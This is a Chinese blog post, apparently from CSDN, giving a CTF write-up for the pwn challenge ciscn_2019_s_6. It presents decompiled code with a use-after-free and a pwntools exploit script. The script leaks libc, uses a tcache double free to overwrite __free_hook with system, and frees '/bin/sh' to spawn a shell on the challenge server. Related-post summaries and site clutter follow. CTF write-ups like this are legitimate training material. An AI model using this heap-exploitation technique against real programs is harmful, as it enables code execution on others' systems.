ciscn_2019_s_6

最新推荐文章于 2024-09-10 19:45:10 发布
最新推荐文章于 2024-09-10 19:45:10 发布
阅读量48 收藏
点赞数
分类专栏: Buuoj刷题 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62887641/article/details/132799745
版权

ciscn_2019_s_6

Arch:     amd64-64-little
RELRO:    Full RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      PIE enabled

64位保护全开

unsigned __int64 add()
{
  int v1; // [rsp+4h] [rbp-3Ch]
  void **v2; // [rsp+8h] [rbp-38h]
  size_t size[5]; // [rsp+10h] [rbp-30h] BYREF
  unsigned __int64 v4; // [rsp+38h] [rbp-8h]

  v4 = __readfsqword(0x28u);
  if ( heap_number > 12 )
  {
    puts("Enough!");
    exit(0);
  }
  v1 = heap_number;
  *((_QWORD *)&heap_addr + v1) = malloc(0x18uLL);
  puts("Please input the size of compary's name");
  __isoc99_scanf("%d", size);
  *(_DWORD *)(*((_QWORD *)&heap_addr + heap_number) + 8LL) = size[0];
  v2 = (void **)*((_QWORD *)&heap_addr + heap_number);
  *v2 = malloc(LODWORD(size[0]));
  puts("please input name:");
  read(0, **((void ***)&heap_addr + heap_number), LODWORD(size[0]));
  puts("please input compary call:");
  read(0, (void *)(*((_QWORD *)&heap_addr + heap_number) + 12LL), 0xCuLL);
  *(_BYTE *)(*((_QWORD *)&heap_addr + heap_number) + 23LL) = 0;
  puts("Done!");
  ++heap_number;
  return __readfsqword(0x28u) ^ v4;
}

不限制size大小,

unsigned __int64 call()
{
  int v1; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  puts("Please input the index:");
  __isoc99_scanf("%d", &v1);
  if ( *((_QWORD *)&heap_addr + v1) )
    free(**((void ***)&heap_addr + v1));
  puts("You try it!");
  puts("Done");
  return __readfsqword(0x28u) ^ v2;
}

uaf。。。

unsigned __int64 show()
{
  int v1; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  puts("Please input the index:");
  __isoc99_scanf("%d", &v1);
  getchar();
  if ( *((_QWORD *)&heap_addr + v1) )
  {
    puts("name:");
    puts(**((const char ***)&heap_addr + v1));
    puts("phone:");
    puts((const char *)(*((_QWORD *)&heap_addr + v1) + 12LL));
  }
  puts("Done!");
  return __readfsqword(0x28u) ^ v2;
}

show这里因为uaf也可以直接泄露libc

思路

利用uaf泄露libc,本题部署在libc-2.27,并且是可以使用tcache double free直接改fd,

再改freehook–>system–>free掉/bin/sh

from pwn import*
from Yapack import *
libc=ELF('libc.so.6')

context(os='linux', arch='amd64',log_level='debug')
r,elf=rec("node4.buuoj.cn",27734,"./pwn",10)

add(0x420,b'aa',b'b'*0xc)#0
add(0x20,b'aa',b'bb')#1
add(0x20,b'/bin/sh\x00',b'bb')#2
dele(0)
show(0)
leak=get_addr_u64()-libc.sym['__malloc_hook']-96-0x10
li(leak)
free=freehook(leak)
sys=system(leak)
dele(1)
dele(1)
add(0x20,p64(free),b'bb')
add(0x20,b'aa',b'bb')
add(0x20,p64(sys),b'bb')
dele(2)
#debug()

ia(c)

在这里插入图片描述

YameMres
关注
专栏目录
ciscn_2019_ne_5
m0_52231248的博客
11-15 333
ciscn_2019_ne_5 Checksec: Ida: 首先会让我们输入密码,密码正确就会进入一个switch循环 我们看到循环中case4是调用catflag函数,跟进查看 Catflag函数中存在strcpy(dest,src)dest(offest)=0x44+4,只要我们能控制src就会存在溢出 再次回到main我们发现case1调用的addlog可以让我们输入src 于是思路就很清楚了先case1调用addlog输入我们的payload再case4将pa
ciscn_2019_en_3
fayinq的博客
03-14 462
ciscn_2019_en_3 首先写在前面的话,这道题找到关键点之后不能说十分简单,只能说非常的简单,但是这个题还是卡了我不久时间,最开始想了半天怎么泄露出libc地址,学过的方法全是不行,血压当场up。但是看了wp一眼之后就能秒杀了,当场高血压。 函数分析: Func_init(): Func_Execute(): 这其中本来是4个函数,但是show()和edit()函数没有东西,所以命名就省略了 Func_ADD(): Func_Free(): FREE的地方很明显,他
ciscn_2019_s_6(uaf)
m0_51251108的博客
11-16 366
ciscn_2019_s_6: 保护全开 漏洞分析: 指针未清零,存在uaf 大致步骤: 利用unsortbin泄露libc,doublefree劫持free_hook为system exp: from pwn import * local_file = './ciscn_s_6' local_libc = './libc-2.27.so' remote_libc = './libc-2.27.so' select = 1 if select == 0: r = process(local_
ciscn_2019_es_2
小白垃圾笔记2
05-21 708
小白垃圾做题笔记,不及建议阅读。声明,exp来自网络,调试过程自己调试,对于题目的理解仅供参考。由于本人也是小白,且pwn全靠自己摸索,所以有很多理解不到位的地方。如有错误,欢迎指正。
BUUCTF栈迁移ciscn_2019_es_2
Rt1Text的博客
04-09 1032
1.checksec+运行获取基本信息 32位+NX堆栈不可执行 2.常规IDA操作 1.main函数 并没有什么 2.int vul()函数 程序主体,信息很多 1.两次read都在往同一个地方s处读入数据 2.要读入0x30,但s大小只有0x28,如果有后门函数,直接常规栈溢出操作 但是shift+f12 这里仅仅是打印flag字符串,没有用 同时查看hack函数 system里面的参数不是bin_sh不能直接用,所以要修改system的参数 但是...
【BUU】ciscn_2019_c_1
bzduanlei的博客
07-30 266
一、解题思路 0x01 检查文件 开启了NX保护,堆栈不可执行。 0x02 将文件拖入IDA分析 分析主函数,发现get(s)函数存在栈溢出。 0x03 未寻找到system和‘/bin/sh’,需要通过puts函数泄露远端服务器中libc的基址,从而利用远端服务器libc中的system和字符串‘/bin/sh’的地址构造payload。 借助LibcSearcher工具,查找函数在内存中的真正地址。 LibcSearcher安装: git clone https://github.com/liean
【pwn】ciscn_2019_s_3
Nothing
12-14 4583
这题是全国大学生信息安全竞赛的一道线下半决赛题目,好像是华南赛区? 例行检查。 分析程序。 vul函数 两个系统调用,一个是sys_read,一个是sys_write,往栈上写数据(0x400),从栈上读数据(0x30),存在栈溢出。 还有一个gadget函数。 有两个值得注意的地方。mov rax,0fh 以及mov rax 59。这两个gadget控制了rax的值,看看这两个是什么系统调用...
日行一PWN之ciscn_2019_c_1不给出libc题型
m0_57221101的博客
06-02 799
BUUCTF ciscn 依旧使用buu提供的题这次大体和上次babyrop一样,都是使用源程序中不存在的函数来进行攻击,区别在于此次没有给出libc的版本,我们需要自己暴漏libc的版本以及本次的64位程序,在传参上和32位程序的一些不同闲话少叙,后面需要的知识点我们后面再学,我们便分析边聊checksec分析64位的程序,只有数据段免执行保护。地址为0000000000400B28我们可以通过telnet连接一下看看她在干什么可以看到是一个简单的输入判断
BUUCTF pwn ciscn_2019_n_8
菜的只能随便写写博客
02-03 2622
0x01 文件分析  文件很简单,32位,保护都开得差不多。   0x02 运行  输入并且回显。   0x03 IDA源码分析 int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [esp-14h] [ebp-20h] int v5; // [esp-10h] [ebp-1Ch] ...
快速失败 (fail-fast) 和安全失败 (fail-safe)
Flying_Fish_roe的博客
09-07 1015
快速失败是一种系统设计原则,当系统遇到异常情况或错误时,立即停止执行并返回错误,而不是试图继续执行或处理潜在的问题。快速失败系统会主动检测系统中的问题,并尽早报告错误,以防止错误进一步传播或导致更大的问题。在快速失败系统中,当检测到某些异常条件或不一致时,系统立即抛出异常或错误,停止当前操作并通知用户或开发者。这种机制通常用于防止错误堆积,使得系统可以快速恢复到正常状态,并尽早解决问题。快速失败的核心思想是“及早报告、及早修复”。通过尽早暴露错误,开发者能够更容易地定位问题,减少问题在系统中的蔓延。
注册安全分析报告:熊猫频道
Explinks的博客
09-10 585
熊猫频道作为央视的子频道, 采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“业务量很小啦,系统就这么点人用,不怕的” , “我们怎么会被盯上呢,不可能的”等等。有一些理由虽然有道理,但是该来的总是会来的。前期欠下来的债,总是要还的。越早还,问题就越小,损失就越低。
网站安全需求分析与安全保护工程
weixin_49171105的博客
09-09 799
网站:是基于B/S技术架构的综合信息服务平台,主要提供网页信息及业务后台对外接口服务。
新书宣传:《量子安全:信息保护新纪元》
最新发布
Chahot的博客
09-10 556
你好!这是我第一次发布类广告的博文,目的也很单纯,希望以作者的身份介绍一下自己出版的图书——《量子安全:信息保护新纪元》。此书于2024年7月出版,目前各大平台有售,是电子工业出版社&博文视点旗下图书。本书从经典信息安全框架始详细阐述了网络安全的核心概念、关键技术及其应用,并对以量子密钥分发、量子隐态传输、超密编码等为代表的量子安全技术行了深的解析,以实际案例和故事为基础,增强了内容的趣味性和实用性,最后还揭示了前沿量子安全技术的研究成果与方向。
3.比 HTTP 更安全的 HTTPS(工作原理理解、非对称加密理解、证书理解)
weixin_52173250的博客
09-07 1518
HTTPS(Hypertext Transfer Protocol Secure)是一种安全的超文本传输协议,主要用于在客户端和服务器之间安全地传输数据
【绿盟科技盟管家-注册/登录安全分析报告】
09-10 1314
绿盟科技应用互联网技术启动“盟管家”服务模式。通过全方位的数据集成平台,实现信息互通、化繁为简。已注册用户可实时了解Case处理进度及情况,帮助客户智能化判断紧急漏洞、设备版本,实时提供风险预警、升级提醒等。作为老牌安全头部科技公司, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“
Java安全-动态加载字节码
柠檬i的博客
09-07 1269
众所周知,不同平台、不通CPU的计算机指令有差异,但因为Java是一门跨平台的编译型语言,所以这些差异对于上层开发者来说是透明的,上层开发者只需要将自己的代码编译一次,即可运行在不同平台的JVM虚拟机中。
【中国国际航空-注册/登录安全分析报告】
09-07 1906
中国国际航空公司联合中国航空总公司和中国西南航空公司,成立了中国航空集团公司,作为航空领域的翘楚,依托国有资源,技术实力雄厚, 人才济济,在吸取了同行滑动验证码的经验后,自己研发了独特风格的那个验证码, 从逆向代码来看, 不仅借鉴了同行的技术原理,还在防抓取上下了功夫,防模拟器鼠标,物理鼠标和逻辑鼠标定位不一致判断措施,解决思路为让JS 这部分代码失效或这采用 物理定位鼠标的部分,目前采用的是物理鼠标的方式。
网络设备安全
weixin_49171105的博客
09-09 615
针对交换机、路由器潜在操作安全风险,提供权限分级机制,每种权限级别对应不同操作能力。远程访问路由器一般通过路由器自身提供的网络服务来实现 远程通信是信息是明文,为增强远程访问的安全性,应建立一个专用网络用语设备管理。审计方式:控制台日志审计、缓冲区日志审计、终端审计、SNMP traps、AAA审计、Syslog审计。交换机安全威胁:交换机是网络基础设备,负责网络通信数据包的交换传输。物理安全:物理安全是网络设备安全的基础,物理访问必须得到严格控制。认证协议:AAA网络安全管理机制(认证、授权、计费)
ciscn_2019_c_1
09-12
根据您提供的引用内容和,题目"ciscn_2019_c_1"是一个涉及到fastbin堆漏洞利用的题目。fastbin是一个堆区的数据结构,用于存储小于等于64字节的空闲块。这个题目的漏洞利用难度不大,适合初学者练习。 根据的代码分析,题目的主函数是"main"函数。它首先打印了一些欢迎信息,在一个无限循环中等待用户输入指令。根据用户输入的指令来执行相应的功能。当用户输入为1时,调用"encrypt"函数进行加密操作。当用户输入为2时,提示用户自己进行操作。当用户输入为3时,退出程序。其他输入会提示输入错误。 根据的代码分析,"encrypt"函数用于对用户输入的明文进行加密操作。在函数内部,首先定义了一个字符数组"s"用于存储用户输入的明文。然后使用gets函数获取用户输入,存在栈溢出的漏洞。接下来,对用户输入的明文进行加密操作。根据输入的字符的ASCII值的范围,使用不同的异或值进行加密。最后将加密后的密文打印出来。 综上所述,题目"ciscn_2019_c_1"是一个涉及fastbin堆漏洞利用的题目。在主函数中,根据用户输入的指令来执行相应的功能,包括调用"encrypt"函数进行加密操作。"encrypt"函数中存在栈溢出漏洞,并对用户输入的明文进行加密操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值